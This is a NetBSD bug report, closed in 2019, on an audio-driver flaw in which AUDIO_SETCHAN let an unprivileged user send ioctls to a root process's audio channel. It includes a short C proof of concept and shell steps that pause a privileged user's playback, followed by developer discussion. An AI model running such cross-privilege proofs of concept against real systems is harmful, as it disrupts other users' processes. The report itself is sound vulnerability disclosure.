NetBSD Problem Report #52627

From www@NetBSD.org  Wed Oct 18 13:26:10 2017
Return-Path: <www@NetBSD.org>
Received: from mail.netbsd.org (mail.netbsd.org [199.233.217.200])
	(using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits))
	(Client CN "mail.NetBSD.org", Issuer "mail.NetBSD.org CA" (not verified))
	by mollari.NetBSD.org (Postfix) with ESMTPS id BB0C77A20D
	for <gnats-bugs@gnats.NetBSD.org>; Wed, 18 Oct 2017 13:26:10 +0000 (UTC)
Message-Id: <20171018132609.B025F7A2A9@mollari.NetBSD.org>
Date: Wed, 18 Oct 2017 13:26:09 +0000 (UTC)
From: isaki@pastel-flower.jp
Reply-To: isaki@pastel-flower.jp
To: gnats-bugs@NetBSD.org
Subject: ioctl(AUDIO_SETCHAN) is able to affect privileged process
X-Send-Pr-Version: www-1.0

>Number:         52627
>Category:       kern
>Synopsis:       ioctl(AUDIO_SETCHAN) is able to affect privileged process
>Confidential:   no
>Severity:       critical
>Priority:       high
>Responsible:    isaki
>State:          closed
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Wed Oct 18 13:30:00 +0000 2017
>Closed-Date:    Sat May 25 03:16:52 +0000 2019
>Last-Modified:  Sat May 25 03:16:52 +0000 2019
>Originator:     Tetsuya Isaki
>Release:        NetBSD 8.0_BETA
>Organization:
>Environment:
NetBSD 8.0_BETA i386
>Description:
ioctl(AUDIO_SETCHAN) allows subsequent audio ioctls to be issued to other
virtual channels.  The virtual channel number does not have credentials
(and is predictable).
This allows unprivileged user to issue any audio ioctls to privileged
process (even if sysctl hw.<dev>.multiuser = 0).

>How-To-Repeat:
% cat a.c
#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/audioio.h>
#include <sys/ioctl.h>

int main(int ac, char *av[])
{
	audio_info_t ai;
	int fd;
	int r;
	int val;

	fd = open("/dev/audioctl", O_RDWR);
	if (fd == -1)
		err(1, "open");

	/* fd is virtual channel 1, so upcoming virtual channel will be 2 */
	val = 2;
	r = ioctl(fd, AUDIO_SETCHAN, &val);
	if (r == -1)
		err(1, "AUDIO_SETCHAN");

	AUDIO_INITINFO(&ai);
	ai.play.pause = 1;
	for (;;) {
		usleep(1000);
		r = ioctl(fd, AUDIO_SETINFO, &ai);
		if (r == -1) {
			if (errno != ENXIO)
				err(1, "AUDIO_SETINFO");
			continue;
		}
		printf("pause!\n");
		break;
	}

	close(fd);
	return 0;
}

%

 (First, execute this sample code by unprivileged user)

% id -u
100
% gcc a.c
% ./a.out

 (Then, start playback by privileged user)

# id -u
0
# audioplay somemusic.wav

 (this playback pauses soon and process blocks...)

>Fix:
N/A.
In the narrow view, virtual channel number also needs credentials? but
I don't know about security area.
In the wide view, however, I think the new audio behavior(specification)
needs more consideration before 8.0.

>Release-Note:

>Audit-Trail:

Responsible-Changed-From-To: kern-bug-people->nat
Responsible-Changed-By: nat@NetBSD.org
Responsible-Changed-When: Tue, 22 May 2018 02:34:05 +0000
Responsible-Changed-Why:
I'll handle this.


From: Nathanial Sloss <nat@netbsd.org>
To: gnats-bugs@netbsd.org
Cc: 
Subject: Re: kern/52627 audio_setchan affecting privileged process
Date: Mon, 28 May 2018 11:07:12 +1000

 Hi,

 I have a proposed fix for affecting a privileged process.

 Please see:

 http://mail-index.netbsd.org/tech-kern/2018/05/28/msg023451.html

 Please let me know if this works for you.

 Best regards,

 Nat

From: matthew green <mrg@eterna.com.au>
To: gnats-bugs@NetBSD.org
Cc: nat@NetBSD.org, gnats-admin@netbsd.org, netbsd-bugs@netbsd.org,
    isaki@pastel-flower.jp
Subject: re: kern/52627 audio_setchan affecting privileged process
Date: Sat, 02 Jun 2018 04:24:39 +1000

 i don't think this is a real bug.  as i just posted to tech-kern:

 > i object to the plan here.  we should simply just use the
 > file system to control this, like normal unix stuff.
 > 
 > eg, ttyaction should chown the audio device to the console
 > user or whatever the admin chooses.  it should be possible
 > for me to decide to make things as open or as closed as
 > possible via chown/chmod/mknod/rm.


 .mrg.

Responsible-Changed-From-To: nat->kern-bug-people
Responsible-Changed-By: nat@NetBSD.org
Responsible-Changed-When: Wed, 08 May 2019 21:55:03 +0000
Responsible-Changed-Why:


Responsible-Changed-From-To: kern-bug-people->isaki
Responsible-Changed-By: isaki@NetBSD.org
Responsible-Changed-When: Sat, 25 May 2019 03:16:52 +0000
Responsible-Changed-Why:


State-Changed-From-To: open->closed
State-Changed-By: isaki@NetBSD.org
State-Changed-When: Sat, 25 May 2019 03:16:52 +0000
State-Changed-Why:
By merging isaki-audio2 branch, AUDIO_SETCHAN is now obsoleted.


>Unformatted:

Home	PR Database Search